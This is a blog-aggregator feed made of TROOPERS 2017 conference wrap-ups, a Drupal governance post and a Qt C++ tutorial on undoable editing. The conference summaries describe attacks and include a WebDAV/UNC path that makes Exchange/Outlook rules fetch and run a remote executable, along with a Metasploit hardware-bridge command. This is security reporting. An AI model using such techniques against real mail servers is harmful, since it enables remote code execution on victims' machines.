The last case was a Siemens module for PLC (CMR 2020). It was not perfect but much better than the other devices. By example, passwords are not only 4 numbers PIN codes but a real alphanumeric password.

Two other examples: a SmartMeter sending UDP packets in clear text with the meter serial number is all packets). And a Solar system control box running Windows CE 6.x. Guest what? The only way to manage the system is via Telnet. Who said that Telnet is dead?

It’s over for today. Stay tuned for more news by tomorrow!

[The post TROOPERS 2017 Day #1 Wrap-Up has been first published on /dev/random]

Xavier Mertens: TROOPERS 2017 Day #2 Wrap-Up

$
0
0

This is my wrap-up for the 2nd day of “NGI” at TROOPERS. My first choice for today was “Authenticate like a boss” by Pete Herzog. This talk was less technical than expected but interesting. It focussed on a complex problem: Identification. It’s not only relevant for users but for anything (a file, an IP address, an application, …). Pete started by providing a definition. Authentication is based on identification and authorisation. But identification can be easy to fake. A classic example is the hijacking of a domain name by sending a fax with a fake ID to the registrar – yes, some of them are still using fax machines! Identification is used at any time to ensure the identity of somebody to give access to something. It’s not only based on credentials or a certificate.

Identification is extremely important. You have to distinguish the good and bad at any time. Not only people but files, IOC’s, threat intelligence actors, etc. For files, metadata can help to identify. Another example reported by Pete: the attribution of an attack. We cannot be 100% confident about the person or the group behind the attack.The next generation Internet needs more and more identification. Especially with all those IoT devices deployed everywhere. We don’t even know what the device is doing. Often, the identification process is not successful. How many times did you send a “hello” to somebody that was not the right person on the street or while driving? Why? Because we (as well as objects) are changing. We are getting older, wearing glasses, etc…  Every interaction you have in a process increases your attack surface the same amount as one vulnerability.  What is more secure? Let a user choose his password or generate a strong one for him? He’ll not remember ours and write it down somewhere. In the same way, what’s best? a password or a certificate? An important concept explained by Pete is the “intent”. The problem is to have a good idea of the intent (from 0 – none – to 100% – certain).

Example: If an attacker is filling your firewall state table, is it a DoS attack? If somebody is performed a traceroute to your IP addresses, is it a foot-printing? Can be a port scan automatically categorized as hunting? And a vulnerability scan will be immediately followed by an attempt to exploit? Not always… It’s difficult to predict specific action. To conclude, Pete mentioned machine learning as a tool that may help in the indicators of intent.

After an expected coffee break, I switched to the second track to follow “Introduction to Automotive ECU Research” by Dieter Spaar. ECU stands for “Electronic Control Unit”. It’s some kind of brain present in modern cars that helps to control the car behaviour and all its options. The idea of the research came after the problem that BMW faced with the unlock of their cars. Dieter’s Motivations were multiple: engine tuning, speedometer manipulation, ECU repair, information privacy (what data are stored by a car?), the “VW scandal” and eCall (Emergency calls). Sometimes, some features are just a question of ECU configuration. They are present but not activated. Also, from a privacy point of view, what infotainment systems collect from your paired phone? How much data is kept by your GPS? ECU’s depend on the car model and options. In the picture below, yellow  blocks are ECU activated, others (grey) are optional (this picture is taken from an Audi A3 schema):

Audi A3 ECU

Interaction with the ECU is performed via a bus. They are different bus systems: the most known is CAN (Controller Area Network), MOST (Media Oriented System Transport), Flexray, LIN (Local Interconnected Network), Ethernet or BroadR-Reach. Interesting fact, some BMW cars have an Ethernet port to speed up the upgrades of the infotainment (like GPS maps). Ethernet provides more bandwidth to upload big files. ECU hardware is based on some typical microcontrollers like Renesas, Freescale or Infineon. Infotainment systems are running on ARM sometimes x86. QNX, Linux or Android. A special requirement is to provide a fast response time after power on. Dieter showed a lot of pictures with ECU where you can easily identify main components (Radio, infotainment, telematics, etc). Many of them are manufactured by Peiker. This was a very quick introduction but this demonstrated that they are still space for plenty of research projects with cars. During the lunch break, I had an interesting chat with two people working at Audi. Security is clearly a hot topic for car manufacturers today!

For the next talk, I switched again to the other track and attended “PUF ’n’ Stuf” by Jacob Torrey& Anders Fogh. The idea behind this strange title was “Getting the most of the digital world through physical identities”. The title came from a US TV show popular in the 60’s. Today, within our ultra-connected digital world, we are moving our identity from a physical world and it becomes difficult to authenticated somebody. We are losing the “physical” aspect. Humans can quickly spot an imposter just by having a look at a picture and after a simple conversation. Even if you don’t personally know the person. But to authenticate people via a simple login/password pair, it becomes difficult in the digital world. The idea of Jacob & Anders was to bring a strong physical identification in the digital world. The concept is called “PUF” or “Physically Uncloneable Function“. To achieve this, they explained how to implement a challenge-response function for devices that should return responses as non-volatile as possible. This can be used to attest the execution state or generate device-specific data. They reviewed examples based on SRAM, EEPROM or CMOS/CCD. The latest example is interesting. The technique is called PRNU and can be used to uniquely identify image sensors. This is often used in forensic investigation to link a picture to a camera. You can see this PUF as a dual-factor authentication. But there are caveats like a lack of proper entropy or PUF spoofing. Interesting idea but no easy to implement in practical cases.

After the lunch, Stefan Kiese had a two-hours slot to present “The Hardware Striptease Club”. The idea of the presentation was to briefly introduce some components that we can find today in our smart houses and see how to break them from a physical point of view. Stefan briefly explained the methodology to approach those devices. When you do this, never forget the impact (loss of revenue, theft of credentials, etc… or worse life (pacemakers, cars). Some reviewed victims:

  • TP-Link NC250 (Smart home camera)
  • Netatmo weather station
  • BaseTech door camera
  • eQ-3 home control access point
  • Easy home wifi adapter
  • Netatmo Welcome

It made an electronic crash course but also insisted on the risks to play with electricity powered devices! Then, people were able to open and disassemble the devices to play with them.

I didn’t attend the second hour because another talk looked interesting: “Metasploit hardware bridge hacking” by Craig Smith. He is working at Rapid7 and is playing with all “moving” things from cars to drones. To interact with those devices, a lot of tools and gadgets are required. The idea was to extend the Metasploit framework to be able to pentest these new targets. With an estimation of 20.8 billions of IoT devices connected (source: Gartner), pentesting projects around IoT devices will be more and more frequent. Many tools are required to test IoT devices: RF Transmitters, USB fuzzers, RFID cloners, JTAG devices, CAN bus tools, etc. The philosophy behind Metasploit remains the same: based on modules (some exploits, some payload, some shellcodes). New modules are available to access relays which talk directly to the hardware module. Example:

msf> use auxililary/server/local_hwbridge

A Metasploit relay is a lightweight HTTP server that just makes JSON translations between the bridge and Metasploit.

Example: ELM327 diagnostic module can be used via serial USB or BT. Once connected all the classic framework features are available as usual:

./tools/hardware/elm327_relay.rb

Other supported relays are RF transmitter or Zigbee. This was an interesting presentation.

For the last time slot, there was two talks: one about vulnerabilities in TP-Link devices and one presented as “Looking through the web of pages to the Internet of Things“. I chose the second one presented by Gabriel Weaver. The abstract did not describe properly the topic (or I did not understand it) but the presentation was a review of the research performed by Gabriel: “CTPL” or “Cyber Physical Topology Language“.

That’s close the 2nd day. Tomorrow will be dedicated to the regular tracks. Stay tuned for more coverage.

[The post TROOPERS 2017 Day #2 Wrap-Up has been first published on /dev/random]

Xavier Mertens: TROOPERS 2017 Day #3 Wrap-Up

$
0
0

The third day is already over! Today the regular talks were scheduled split in three tracks: offensive, defensive and a specific one dedicated to SAP. The first slot at 09:00 was, as usual, a keynote. Enno Rey presented ten years of TROOPERS. What happened during all those editions? The main ideas behind TROOPERS have always been that everybody must learn something by attending the conference but… with fun and many interactions with other peers! The goal was to mix infosec people coming from different horizons. And, of course, to use the stuff learned to contribute back to the community. Things changed a lot during these ten years, some are better while others remain the same (or worse?). Enno reviewed all the keynotes presented and, for each of them, gave some comments – sometimes funny. The conference in itself also evolved with a SAP track, the Telco Sec Day, the NGI track and when they move to Heidelberg. Some famous vulnerabilities were covered like MS08-067 or the RSA hack. What we’ve seen:

  • A move from theory to practice
  • Some things/crap that stay the same (same shit, different day)
  • A growing importance of the socio-economic context around security.

Has progress been made? Enno reviewed infosec in three dimensions:

  • As a (scientific) discipline: From theory to practice. So yes, progress has been made
  • In enterprise environments: Some issues on endpoints have been fixed but there is a fact: Windows security has become much better but now they use Android :). Security in Datacenter also improved but now there is the cloud. 🙂
  • As a constituent for our society: Complexity is ever growing.

Are automated systems the solution? They are still technical and human factors that are important “Errare Humanum Est” said Enno. Information security is still in progress but we have to work for it. Again, the examples of the IoT crap was used. Education is key. So, yes, the TROOPERS motto is still valid: “Make the world a better place”. Based on the applause from the audience, this was a great keynote by an affected Enno!

I started my day within the defensive track. Veronica Valeros presented “Hunting Them All”. Why do we need hunting capabilities? A definition of threat hunting is “to help in spotting attacks that would pass our existing controls and make more damages to the business“.

Veronica's Daily Job: Hunting!

People are constantly hit by threats (spam, phishing, malware, trojans, RATs, … you name them). Being always online also increases our surface attack. Attacks are very lucrative and attract a lot of bad guys. Sometimes, malware may change things. A good example comes with the ransomware plague: it made people aware that backups are critical. Threat hunting is not easy because when you are sitting on your network, you don’t always know what to search. And malicious activity does not always rely on top-notch technologies. Attackers are not all ‘l33t’. They just want to bypass controls and make their malicious code run. To achieve this, they have a lot of time, they abuse the weakest link and they hide in plain sight. To resume: they use the “less effort rule”. Which sound legit, right? Veronica has access to a lot of data. Her team is performing hunting across hundreds of networks, millions of users and billions of web requests. How to process this? Machine learning came to the rescue. And Veronica’s job is to check and validate the output of the machine learning process they developed. But it’s not a magic tool that will solve all issues. The focus must be given on what’s important: from 10B of requests/day to 20K incidents/day using anomaly detection, trust modelling, event classification, entity & user modelling. Veronica gave an example. The botnet Sality is active since 2003 and still present. IOC’s exists but they generate a lot of false positives. Regular expressions are not flexible enough. Can we create algorithms to automatically track malicious behaviour. For some threats, it works, for others no. Veronica’s team is tracking +200 malicious behaviours and 60% is automated tracking. “Let the machine do the machine work”. As a good example, Veronica explained how referrers can be the source of important data leaks from corporate networks.

My next choice was “Securing Network Automation” by Ivan Peplnjak. In a previous talk, Ivan explained why Software Defined Networks failed but many vendors improved, which is good. So today, his new topic was about ways to improve the automation from a security perspective. Indeed, we must automate as much as possible but how to make it reliable and secure? If a process is well defined, it can be automated as said Ivan. Why automate? From a management perspective, the same reasons come always on the table: increase the flexibility while reducing costs, to have faster deployments and complete for public cloud offering. About the cloud, do we need to buy or to build? In all cases, you’ll have to build if you want to automate. The real challenge is to move quickly from development to test and production. To achieve this, instead of editing a device configuration live, create configuration text files, push them to a gitlab server. Then you can virtualise a lab, pull config and test them. Did it work? Then merge with the main branch. A lot can be automated: device provisioning, VLANs management, ACLs, firewall rules. But the challenge is to have strong controls to prevent issues upfront and troubleshoot if needed. A nice quote was:

“To make mistake is human, to automatically deploy mistake to all the servers use DevOps”

You remember the amazon bad story? Be prepared to face issues. To automate, you need tools and such tool must be secure. An example was given with Ansible. The issues are that it gathers information from untrusted source:

  • Scripts are executed on managed devices: what about data injection?
  • Custom scripts are included in data gathering: More data injection?
  • Returned data are not properly parsed: Risk of privilege escalation?

The usual controls to put in place are:

  • OOB management
  • Management network / VR
  • Limit access to the management hosts
  • SSH-based access
  • Use SSH keys
  • RBAC (commit scripts)

Keep in mind: Your network is critical so automatic (network programming) is too. Don’t write code yourself (hire a skilled Python programmer for this task) but you must know what the code should do. Test, test, test and once done, test again. As an example of control, you can perform a trace route before / after the change and compare the path. Ivan published a nice list of requirements for your vendor while looking for a new network device. If your current vendor cannot provide you basic requirements like an API, change it!

After the lunch, back to the defence & management track with “Vox Ex Machina” by Grame Neilson. The title looked interesting, was it more offensive of defensive content? Voice recognition is more and more used (example: Cortana, Siri, etc) but also on non-IT systems like banking or support system: “Press 1 for X or press 2 for Y”. But is it secure? Voice recognition is not a new hipe. There are references to the “Voder” already in 1939. Another system was the Vocoder a few years later. Voice recognition is based on two methods: phrase dependent or independent (the current talk will focus on the first method). The process is split in three phases:

  • Enrolment: your record a phrase x times. It must be different and the analysis is stored as a voice print.
  • Authentication: Based on feature extraction or MFCC (Mel-Frequency Cepstrum Correlation).
  • Confidence: Returned as a percentage.

The next part of the talk focused on the tool developed by Grame. Written in Python, it tests a remote API. The different supported attacks are: replay, brute-force and voice print fixation. An important remark made by Grame: Event if some services pretend it, your voice is NOT a key! Every time you pronounce “word”, the generated file is different. That’s why the process of brute-forcing is completely different with voice recognition: You know when you are getting closer due to the returned confidence  (in %) instead of a password comparison which returns “0” or “1”. The tool developed by Grame is available here (or will be soon after the conference).

The next talk was presented by Matt Grabber and Casey Smith: “Architecting a Modern Defense using Device Guard”. The talk was scheduled on the defensive track but it covered both worlds. The question that interest many people is: Is whitelisting a good solution? Bad guys are trying to find bypass strategies (red teams). What are the mitigations available for the blue teams? The attacker’s goal is clear: execute HIS code on YOUR computer. They are two types of attackers: the one who knows what controls you have in place (enlightened) and the novices who aren’t equipped to handle your controls (ex: the massive phishing campaigns dropping Office documents with malicious macros). Device Guard offers the following protections:

  • Prevents unauthorised code execution,
  • Restricted scripting environment
  • Prevents policy tempering and virtualisation based security

The speakers were honest: Device Guard does NOT protect against all the threats but it increases the noises (evidence). Bypasses are possible. how?

  • Policy misconfiguration
  • Misplaced trust
  • Enlightened scripting environments
  • Exploitation of vulnerable code
  • Implementation flaws

The way you deploy your policy depends on your environment is a key but also depends on the security eco-system where we are living. Would you trust all code signed by Google? Probably yes. Do you trust any certificate issued by Symantec? Probably not. The next part o the talk was a review of the different bypass techniques (offensive) and them some countermeasures (defensive). A nice demo was performed with Powershell to bypass the language constraint mode. Keep in mind that some allowed applications might be vulnerable. Do you remember the VirtualBox signed driver vulnerability? Besides those problems, Device Guard offers many advantages:

  • Uncomplicated deployment
  • DLL enforcement implicit
  • Supported across windows ecosystem
  • Core system component
  • Powershell integration

Conclusion: whitelisting is often a huge debate (pro/con). Despite the flaws, it forces the adversaries to reset their tactics. By doing this you disrupt the attackers’ economics: if it makes the system harder to compromise, it will cost the more time/money.

After the afternoon coffee break, I switched to the offensive track again to follow Florian Grunow and Niklaus Schuss who presented “Exploring North Korea’s Surveillance Technology”. I had no idea about the content of the talk but it was really interesting and an eye-opener! It’s a fact:  If it’s locked down, it must be interesting. That’s why Florian and Niklaus performed a research on the systems provided to DPRK citizens (“Democratic People’s Republic of Korea“). The research was based on papers published by others and devices / operating systems leaked. They never went over there. The motivation behind the research was to get a clear view of the surveillance and censorship put in place by the government. It started with the Linux distribution called “Red Star OS”. It is based on Fedora/KDE via multiple version and looks like a modern Linux distribution but… First finding: certificates installed in the browser are all coming from the Korean authorities. Also, some suspicious processes cannot be killed. Integrity checks are performed on system files and downloaded files are changed on the fly by the OS (example: files transferred via an USB storage). The OS adds a watermark at the end of the file which helps to identify the computer which was used. If the file is transferred to another computer, a second watermark is added, etc. This is a nice method to track dissidents and to build a graph of relations between them. Note that this watermark is added only on data files and that it can easily be removed. An antivirus is installed but can also be used to deleted files based on their hash. Of course, the AV update servers are maintained by the government. After the desktop OS, the speakers reviewed some “features” installed on the “Woolim” tablet. This device is based on Android and does not have any connectivity onboard. You must use specific USB dongle for this (provided by the government of course). When you try to open some files, you get a warning message “This is not signed file”. Indeed, the tablet can only work with files signed by the government or locally (based on RSA signatures). The goal, here again, is to prevent the distribution of media files. From a network perspective, there is no direct Internet access and all the traffic is routed through proxies. An interesting application running on the tablet is called “TraceViewer”. It takes a screenshot of the tablet at regular interval. The user cannot delete the screenshots and random physical controls can be performed by authorities to keep the pressure on the citizens. This talk was really an eye-opener for me. Really crazy stuff!

Finally, my last choice was another defensive track: “Arming Small Security Programs” by Matthew Domko. The idea is to generate a network baseline, exactly like we do for applications on Windows. For many organizations, the problem is to detect malicious activity on your network. Using an IDS becomes quickly unuseful due to the amount and the limitation of signatures. Matthew’s idea was to:

  • Build a baseline (all IPs, all ports)
  • Write snort rules
  • Monitor
  • Profit

To achieve this, he used the tool Bro. Bro is some kind of Swiss army knife for IDS environments. Matthew made a quick introduction to the tool and, more precisely, focussed on the scripting capabilities of Bro. Logs produced by Bro are also easy to parse. The tool developed by Matthew implements a simple baseline script. It collects all connections to IP addresses / ports and logs what is NOT know. The tool is called Bropy and should be available soon after the conference. A nice demo was performed. I really liked the idea behind this tool but it should be improved and features added to be used on big environments. I would recommend having a look at it if you need to build a network activity baseline!

The day ended with the classic social event. Local food, drinks and nice conversations with friends, which is priceless. I have to apologize for the delay to publish this wrap-up. Complaints can be sent to Sn0rkY! 😉

[The post TROOPERS 2017 Day #3 Wrap-Up has been first published on /dev/random]


Philip Van Hoof: Perfection

$
0
0

Perfection has been reached not when there is nothing left to add, but when there is nothing left to take away.

Dries Buytaert: Living our values

$
0
0

The Drupal community is committed to welcome and accept all people. That includes a commitment to not discriminate against anyone based on their heritage or culture, their sexual orientation, their gender identity, and more. Being diverse has strength and as such we work hard to foster a culture of open-mindedness toward differences.

A few weeks ago, I privately asked Larry Garfield, a prominent Drupal contributor, to leave the Drupal project. I did this because it came to my attention that he holds views that are in opposition with the values of the Drupal project.

I had hoped to avoid discussing this decision publicly out of respect for Larry's private life, but now that Larry has written about it on his blog and it is being discussed publicly, I believe I have no choice but to respond on behalf of the Drupal project.

It's not for me to judge the choices anyone makes in their private life or what beliefs they subscribe to. I also don't take any offense to the role-playing activities or sexual preferences of Larry's alternative lifestyle.

What makes this difficult to discuss, is that it is not for me to share any of the confidential information that I've received, so I won't point out the omissions in Larry's blog post. However, I can tell you that those who have reviewed Larry's writing, including me, suffered from varying degrees of shock and concern.

In the end, I fundamentally believe that all people are created equally. This belief has shaped the values that the Drupal project has held since it's early days. I cannot in good faith support someone who actively promotes a philosophy that is contrary to this. The Gorean philosophy promoted by Larry is based on the principle that women are evolutionarily predisposed to serve men and that the natural order is for men to dominate and lead.

While the decision was unpleasant, the choice was clear. I remain steadfast in my obligation to protect the shared values of the Drupal project. This is unpleasant because I appreciate Larry's many contributions to Drupal, because this risks setting a complicated precedent, and because it involves a friend's personal life. The matter is further complicated by the fact that this information was shared by others in a manner I don't find acceptable either and will be dealt with separately.

However, when a highly-visible community member's private views become public, controversial, and disruptive for the project, I must consider the impact that his words and actions have on others and the project itself. In this case, Larry has entwined his private and professional online identities in such a way that it blurs the lines with the Drupal project. Ultimately, I can't get past the fundamental misalignment of values.

Collectively, we work hard to ensure that Drupal has a culture of diversity and inclusion. Our goal is not just to have a variety of different people within our community, but to foster an environment of connection, participation and respect. We have a lot of work to do on this and we can't afford to ignore discrepancies between the espoused views of those in leadership roles and the values of our culture. It's my opinion that any association with Larry's belief system is inconsistent with our project's goals.

It is my responsibility and obligation to act in the best interest of the project at large and to uphold our values. Decisions like this are unpleasant and disruptive, but important. It is moments like this that test our commitment to our values. We must stand up and act in ways that demonstrate these values. For these reasons, I'm asking Larry to resign from the Drupal project.

(Comments on this post are allowed but for obvious reasons will be moderated.)

Xavier Mertens: TROOPERS 2017 Day #4 Wrap-Up

$
0
0

I’m just back from Heidelberg so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little bit more difficult due to the fatigue and the social event of yesterday. That’s why the wrap-up will be shorter…  The second keynote was presented by Mara Tam: “Magical thinking … and how to thwart it”. Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic remained classic. Mara explained her vision of the problems that the infosec community is facing when information must be exchanged with “the outside world”. Personally, I found that Mara’s slides were difficult to understand. 

For the first presentation of the day, I stayed in the main room – the offensive track – to follow “How we hacked distributed configuration management systems” by Francis Alexander and Bharadwaj Machhiraju. As we already saw yesterday with the SDN, automation is a hot topic and companies tend to install specific tools to automate the configuration tasks. Such software is called DCM or “Distributed Configuration Management”. They simplify the maintenance of complex infrastructures, the synchronization and service discovery. But, as software, they also have bugs or vulnerabilities and are, for a pentester, a nice target. They’re real goldmines because they content not only configuration files but if the attacker can change them, it’s even more dangerous. DCM can be agent-less or -based on agents. This is the second case that was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, that explained the vulnerability they found and how it was exploited up to remote code execution. The crazy story is that all of them do not have authentication enabled by default! To automate the search for DCM and exploitation, they developed a specific tool called Garfield. Nice demos were performed during the talk with many remote shells and calc.exe spawned here and there.

The next talk was my favourite of today. It was about a tool called Ruller to pivot through Exchange servers. Etienne Stamens presented his research on Microsoft Exchange and how he reverse engineered the protocol. The goal is just to get a shell though Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users so it exposes services on the Internet. How do identify companies that use an Exchange server and how to find it? Simply thanks to the auto-discovery feature that is implemented by Microsoft. If your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (+ other alternatives URLs if this one isn’t useful). Etienne did some research and found that 10% of the Internet domains have this process enabled. After some triage, he found that approximatively 26000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute-force, rogue wireless AP, phishing or dumps of leaked databases). The exploitation in itself is performed by creating a rule that will execute a script. The rule looks like “When the word “pwned” is present in the subject, start “badprogram.exe”. A very nice finding is the way Windows converts UNC path to webdav:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdab/pew.zip

And Windows will even extract s.exe for you! Magic!

Etienne performed a nice demo of Ruler which automates all the process described above. Then, he demonstrated another tool called Linial which takes care of the persistence. To conclude, Etienne explained briefly how to harden Exchange to prevent this kind of attack. Outlook 2016 blocks unsafe rules by default which is good. An alternative is to block WebDAV and use MFA.

After the lunch, Zoz came back with another funny presentation: “Data Demolition: Gone in 60 seconds!”. The idea is simple: When you throw away some devices, you must be sure that they don’t contain remaining critical data. Classic examples are HD’s and printers. Also extremely mobiles devices like drones. The talk was some kind of a “Myth Busters” show for hard drives! Different techniques were tested by Zoz:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with small videos. Crazy!

Destroying HD's

What was interesting to notice is that most techniques failed because the disk plates could still be “cleaned” (ex: removing the dust) and become maybe readable by using forensic techniques. For your information, the most feasible techniques were: Plasma cutter or oxygen injector, nailguns and HV Power spike. Just one advice: don’t try this at home!

There was a surprise talk scheduled. The time slot was offered to The Grugq. Renowned security researcher, he presented “Surprise Bitches, Enterprise Security Lessons From Terrorists”. He talked about APT’s but not as a buzzword. He gave his own view of how APT’s work. For him, the term “APT” was invented by Americans and means: “Asia Pacific Threat“.

I finished the day back to offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented “Exploring the Infrared, part 2“. The first part was presented at Schmoocon. Hopefully, they started with a quick recap. What is the infrared light and its applications (remote control, sensors, communications, heating systems, …). The talk was a suite of nice demos where they use replay attack techniques to abuse of tools/toys that work with IR like a Dunk Hunt game, a shark remote controller. The most impressive one was the replay attack against the Bosh audio transmitter. This very expensive device is used in big events for instant translations. They were able to reverse engineer the protocol and were able to play a song through the device… You can imagine the impact of such attack in a live event (ex: switching voices, replacing translations by others, etc). They have many more tests in the pipe.

IR Fun

The last talk was “Blinded Random Block Corruption” by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and provides always good content. His presentation was very impressive. They idea is to evaluate the problems around memory encryption? How and why to use it? Physical access to the victim is the worse case. An attacker has access to anything. You implemented full-disk encryption? Cool but many info are in the memory when the system is running. Access to memory can be performed via Firewire, PCIe, PCMCIA and new USB standards. What about memory encryption? It’s good but encryption alone is not enough. Controls must be implemented. The attack explained by Rodrigo is called “BRBC” or  “Blinded Random Block Corruption“. After giving the details, a nice demo was realized: how to become root on a locked system? Access to the memory is more easy in virtualized (or cloud) environments. Indeed many hypervisors allow enabling a “debug” feature per VM. Once activated, the administrator has write access to the memory. By using a debugger, you can use the BRBC attack and bypass the login procedure. The video demo was impressive.

So, TROPPER 10th anniversary edition is over. I spend four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my todo-list already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]

Philip Van Hoof: Making something that is undoable editable with Qt

$
0
0

Among the problems we’ll face is that we want asynchronous APIs that are undoable and that we want to switch to read only, undoable editing, non-undoable editing and that QML doesn’t really work well with QFuture. At least not yet. We want an interface that is easy to talk with from QML. Yet we want to switch between complicated behaviors.

We will also want synchronous mode and asynchronous mode. Because I just invented that requirement out of thin air.

Ok, first the “design”. We see a lot of behaviors, for something that can do something. The behaviors will perform for that something, the actions it can do. That is obviously the strategy design pattern, then. Right? That’s the one about ducks and wing fly behavior and rocket propelled fly behavior and then the ostrich that has a can’t fly behavior. And undo and redo, that certainly sounds like the command pattern. We also have this neat thing in Qt for that. We’ll use it. We don’t reinvent the wheel. Reinventing the wheel is stupid.

Let’s create the duck. I mean, the thing-editor. As I will use “Thing” for the thing that is being edited. We want copy (sync is sufficient), paste (must be aysnc), and edit (must be async). We could also have insert and delete, but those APIs would be just like edit. And that would make the example only longer. Paste would usually be similar to insert, of course. Except that it can be a combined delete and insert when overwriting content. The command pattern allows you to make such combinations. Not the purpose of this example, though.

Enough explanation for a blog. Let’s start! The ThingEditor, is like the flying Duck in strategy. This is going to be more or less the API that we will present to the QML world. It could be your ViewModel, for example (ie. you could let your ThingViewModel subclass ThingEditor).

class ThingEditor :publicQObject{Q_OBJECTQ_PROPERTY ( ThingEditingBehavior* editingBehavior READ editingBehavior                 WRITE setEditingBehavior NOTIFY editingBehaviorChanged )Q_PROPERTY ( Thing* thing READ thing WRITE setThing NOTIFY thingChanged )public:explicit ThingEditor( QSharedPointer<Thing> &a_thing,
            ThingEditingBehavior *a_editBehavior,QObject*a_parent =nullptr);explicit ThingEditor(QObject*a_parent =nullptr);

    Thing* thing()const{return m_thing.data();}virtualvoid setThing( QSharedPointer<Thing> &a_thing );virtualvoid setThing( Thing *a_thing );

    ThingEditingBehavior* editingBehavior()const{return m_editingBehavior.data();}virtualvoid setEditingBehavior ( ThingEditingBehavior *a_editingBehavior );

    Q_INVOKABLE virtualvoid copyCurrentToClipboard ();
    Q_INVOKABLE virtualvoid editCurrentAsync(constQString&a_value );
    Q_INVOKABLE virtualvoid pasteCurrentFromClipboardAsync();signals:void editingBehaviorChanged ();void thingChanged();void editCurrentFinished( EditCurrentCommand *a_command );void pasteCurrentFromClipboardFinished( EditCurrentCommand *a_command );private slots:void onEditCurrentFinished();void onPasteCurrentFromClipboardFinished();private:
    QScopedPointer<ThingEditingBehavior> m_editingBehavior;
    QSharedPointer<Thing> m_thing;QList<QFutureWatcher<EditCurrentCommand*>*> m_editCurrentFutureWatchers;QList<QFutureWatcher<EditCurrentCommand*> *> m_pasteCurrentFromClipboardFutureWatchers;};

For the implementation of this class, I’ll only provide the non-obvious pieces. I’m sure you can do that setThing, setEditingBehavior and the constructor yourself. I’m also providing it only once, and also only for the EditCurrentCommand. The one about paste is going to be exactly the same.

void ThingEditor::copyCurrentToClipboard (){
    m_editingBehavior->copyCurrentToClipboard();}void ThingEditor::onEditCurrentFinished(){QFutureWatcher<EditCurrentCommand*>*resultWatcher
            =static_cast<QFutureWatcher<EditCurrentCommand*>*>( sender());emit editCurrentFinished ( resultWatcher->result());if(m_editCurrentFutureWatchers.contains( resultWatcher )){
        m_editCurrentFutureWatchers.removeAll( resultWatcher );}
delete resultWatcher;}void ThingEditor::editCurrentAsync(constQString&a_value ){QFutureWatcher<EditCurrentCommand*>*resultWatcher
            =newQFutureWatcher<EditCurrentCommand*>();connect( resultWatcher,&QFutureWatcher<EditCurrentCommand*>::finished,this,&ThingEditor::onEditCurrentFinished,Qt::QueuedConnection );
    resultWatcher->setFuture ( m_editingBehavior->editCurrentAsync( a_value ));
    m_editCurrentFutureWatchers.append ( resultWatcher );}

For QUndo we’ll need a QUndoCommand. For each undoable action we indeed need to make such a command. No worries, it’s easy. You could add more state and pass it to the constructor. It’s common, for example, to pass Thing, or the ThingEditor or the behavior (this is why I used QSharedPointer for those: as long as your command lives in the stack, you’ll need it to hold a reference to that state).

class EditCurrentCommand:publicQUndoCommand{public:explicit EditCurrentCommand(constQString&a_value,QUndoCommand*a_parent =nullptr):QUndoCommand( a_parent ), m_value ( a_value ){}void redo() Q_DECL_OVERRIDE {// Perform action goes here}void undo() Q_DECL_OVERRIDE {// Undo what got performed goes here}private:constQString&m_value;};

You can (and probably should) also make this one abstract (and/or a so called pure interface), as you’ll usually want many implementations of this one (one for every kind of editing behavior). This is like the fly behavior in the duck that flies -example of strategy. Note that it leaks the QUndoCommand instances unless you handle them (ie. storing them in a QUndoStack). That in itself is a good reason to call the thing abstract.

class ThingEditingBehavior :publicQObject{Q_OBJECTQ_PROPERTY ( ThingEditor* editor READ editor WRITE setEditor NOTIFY editorChanged )Q_PROPERTY ( Thing* thing READ thing NOTIFY thingChanged )public:explicit ThingEditingBehavior( ThingEditor *a_editor,QObject*a_parent =nullptr):QObject( a_parent ), m_editor ( a_editor ){}explicit ThingEditingBehavior(QObject*a_parent =nullptr):QObject( a_parent ){}

    ThingEditor* editor()const{return m_editor.data();}virtualvoid setEditor( ThingEditor *a_editor );
    Thing* thing()const;virtualvoid copyCurrentToClipboard ();virtualQFuture<EditCurrentCommand*> editCurrentAsync(constQString&a_value,bool a_exec =true);virtualQFuture<EditCurrentCommand*> pasteCurrentFromClipboardAsync(bool a_exec =true);protected:virtual EditCurrentCommand* editCurrentSync(constQString&a_value,bool a_exec =true);virtual EditCurrentCommand* pasteCurrentFromClipboardSync(bool a_exec =true);signals:void editorChanged();void thingChanged();private:QPointer<ThingEditor> m_editor;bool m_synchronous =true;};

That setEditor, the constructor, etc: these are too obvious to write here. You can do that yourself. Right? Here are the non-obvious ones:

void ThingEditingBehavior::copyToClipboard (){Q_UNUSED(a_row);// TODO: Implementation of copying the current to clipboard. See QClipboard}

EditCurrentCommand* ThingEditingBehavior::editCurrentSync(constQString&a_value,bool a_exec ){
    EditCurrentCommand *ret =new EditCurrentCommand ( a_value );if( a_exec )
        ret->redo();return ret;}QFuture<EditCurrentCommand*> ThingEditingBehavior::editCurrentAsync(constQString&a_value,bool a_exec ){QFuture<EditCurrentCommand*> resultFuture =
            QtConcurrent::run(QThreadPool::globalInstance(),this,&ThingEditingBehavior::editCurrentSync,
                               a_value, a_exec );if(m_synchronous)
        resultFuture.waitForFinished();return resultFuture;}

And now we can finally make the whole thing undoable by making a undoable editing behavior. That’s like the fly with wings behavior of the duck that flies -example of strategy. The edit with undoable behavior of the Thing editor. Right? I’ll leave a non-undoable editing behavior as an exercise to the reader (ie. just perform redo() on the QUndoCommand, don’t store it in the QUndoStack and immediately delete or cmd->deleteLater() the instance).

Note that if m_synchronous is false, that (all access to) m_undoStack must be (made) thread-safe. The thread-safety is not the purpose of this example, though.

